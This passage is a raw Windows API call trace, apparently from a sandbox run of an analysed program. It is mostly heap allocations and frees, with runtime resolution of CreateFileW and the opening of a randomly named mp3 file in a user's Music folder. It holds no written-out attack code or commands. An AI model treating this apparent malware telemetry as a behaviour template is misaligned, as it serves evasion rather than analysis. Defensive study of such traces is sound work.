HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0113.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0113.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0113.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0113.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0113.739] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0113.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0113.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0113.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0113.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0113.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0113.742] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0113.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0113.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0113.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.744] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0113.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca850, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0113.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.745] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0113.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0113.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0113.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0113.746] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\wc8lukbji.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0113.748] HeapFree (in: 